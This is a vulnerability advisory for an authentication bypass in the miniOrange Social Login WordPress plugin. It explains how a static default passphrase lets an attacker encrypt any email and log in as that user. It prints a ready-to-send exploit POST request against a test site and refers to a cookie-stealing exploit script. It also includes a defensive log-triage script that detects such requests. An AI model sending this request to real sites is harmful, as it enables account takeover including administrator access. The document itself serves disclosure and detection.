Social Login and Register by miniOrange WordPress plugin Authentication Bypass
LANAVDB ID: 2326f41f-a39f-4fde-8627-9d29fff91443
The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the website.
Let’s check the plugin
The mo_openid_login_validate() function includes the following request handling:
    // Any request whose 'option' value merely contains "moopenid" is routed to the social login handler.
    if ( isset( $_REQUEST['option'] ) and strpos( sanitize_text_field( $_REQUEST['option'] ), 'moopenid' ) !== false ) {
        mo_openid_process_social_login();
    }
The mo_openid_process_social_login() function receives the email from the request and passes it to mo_openid_decrypt_sanitize( $param ), which calls decrypt_data( $data, $key ) to decrypt it with openssl.
We can see from the code that we need the mo_openid_customer_token option value to decrypt, because the data is encrypted with this passphrase. Since there is no other protection in the code, this means that if we have the passphrase, we can supply our own encrypted data in the request, which the plugin then decrypts and uses as the email.
The email is passed to the mo_openid_process_user_details( $appuserdetails, $appname ) function, where the user id is queried with the following code:
$existing_email_user_id = $wpdb->get_var( $wpdb->prepare( "SELECT ID FROM $wpdb->users where user_email = %s", $user_email ) );
It then calls mo_openid_login_user() with that user, which finally logs the user in.
So we need the mo_openid_customer_token option value. The plugin decrypts the email with this value, looks up the user, and then logs the user in. The miniorange_openid_sso_settings class constructor has the following code that defines the default value statically. So if no user-specific value is set, this static value will be used by the plugin.
We only need to send a POST request to exploit this vulnerability. The HTTP request to https://lana.solutions/vdb/miniorange-login-openid/, which is a test WordPress website:
POST /vdb/miniorange-login-openid/ HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D
We use these values:
option: moopenid
email: uzmpvjPBmwEO3tFXq0vlJg== (which is [email protected], the email, encrypted and encoded)
appName: rlHeqZw2vrPzOiWWfCParA== (which is wordpress, the appName, encrypted and encoded)
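From the defender's side, the request above is the thing to look for: a POST that hits the social login handler with a client-supplied, encrypted email parameter and no identity-provider redirect in front of it. The following Python triage script is an added example, not part of this advisory or of the plugin. It assumes a hypothetical reverse-proxy/WAF log format that records the Referer header and the URL-encoded POST body next to the usual access-log fields; the sample lines and the trusted identity-provider origin https://login.example-idp.test/ are constructed for the example. It mirrors the plugin's own dispatch rule (the 'option' value only has to contain "moopenid") and merges query-string and body parameters the way PHP's $_REQUEST does.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# Constructed sample log (not from the advisory or any real server). The
# hypothetical format assumes a proxy/WAF that logs referer="..." and the
# URL-encoded POST body as body="..." after the status code.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /vdb/miniorange-login-openid/ HTTP/1.1" 302 referer="" body="option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-login.php HTTP/1.1" 200 referer="" body=""
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 302 referer="https://lana.solutions/vdb/wp-login.php" body="log=alice&pwd=REDACTED"
10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "POST /?option=xmoopenidx HTTP/1.1" 302 referer="" body="email=notbase64!!&appName=x"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "POST /vdb/miniorange-login-openid/ HTTP/1.1" 302 referer="https://login.example-idp.test/return" body="option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
    r'referer="(?P<referer>[^"]*)" body="(?P<body>[^"]*)"$'
)


def _first_values(qs):
    """Flatten parse_qs output to {name: first value}."""
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def parse_request(line):
    """Parse one log line; merge query and body parameters like PHP's $_REQUEST
    (with the usual variables_order, POST values override GET values)."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    d = m.groupdict()
    path, _, query = d["target"].partition("?")
    params = _first_values(query)
    params.update(_first_values(d["body"]))
    return {"ip": d["ip"], "method": d["method"], "path": path,
            "referer": d["referer"], "params": params}


def looks_like_cipher_blob(value):
    """True if value is valid base64 whose decoded length is a whole number of
    16-byte blocks, the shape of the plugin's openssl-encrypted parameters."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) > 0 and len(raw) % 16 == 0


def triage(line, trusted_referers=()):
    """Return an alert dict for a request that reaches the social login
    handler, or None if the line is unparseable or not routed there."""
    req = parse_request(line)
    if req is None:
        return None
    params = req["params"]
    # Mirror the plugin's gate: strpos(option, 'moopenid') !== false.
    if "moopenid" not in params.get("option", ""):
        return None
    findings = []
    email = params.get("email")
    if email is not None:
        findings.append("client-supplied email parameter reaches the decrypt-and-login path")
        if looks_like_cipher_blob(email):
            findings.append("email is base64 of whole 16-byte blocks (encrypted-parameter format)")
    via_idp = any(req["referer"].startswith(t) for t in trusted_referers)
    if not via_idp:
        findings.append("no Referer from a trusted identity-provider origin "
                        "(weak signal: the header is client-controlled)")
    if email is None:
        severity = "info"
    elif via_idp:
        severity = "low"
    else:
        severity = "high"
    return {"ip": req["ip"], "path": req["path"], "severity": severity, "findings": findings}


def scan(log_text, trusted_referers=()):
    """Run triage over every non-empty line and collect the alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        alert = triage(line, trusted_referers)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG, trusted_referers=("https://login.example-idp.test/",)):
        print(a["severity"].upper(), a["ip"], a["path"])
        for f in a["findings"]:
            print("   -", f)
```

The script ranks a direct POST carrying an encrypted-looking email and no identity-provider Referer as "high", the same request arriving via a trusted origin as "low", and any other hit on the handler as "info". Because the legitimate social login flow also delivers the email in this form, the output is a review queue rather than proof of compromise; the durable fix is on the server side (a per-installation token rather than the static default, and a server-held per-request state the callback has to match), not in the log parser.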
The exploit script
I created a Python script that returns the WordPress logged_in and auth cookie (source: miniorange_login_openid_plugin_vdb_get_exploit_cookie.py). Then all we have to do is set the cookie using the browser's Developer Tools on the website, which in our case is https://lana.solutions/vdb/miniorange-login-openid/
Try it
Feel free to try and use the lana.solutions/vdb WordPress website for testing. I have set the roles and capabilities, so you can only get low-level access to the website.
Website: https://lana.solutions/vdb/miniorange-login-openid/
Tags: authentication bypass, exploit, python, wordpress plugin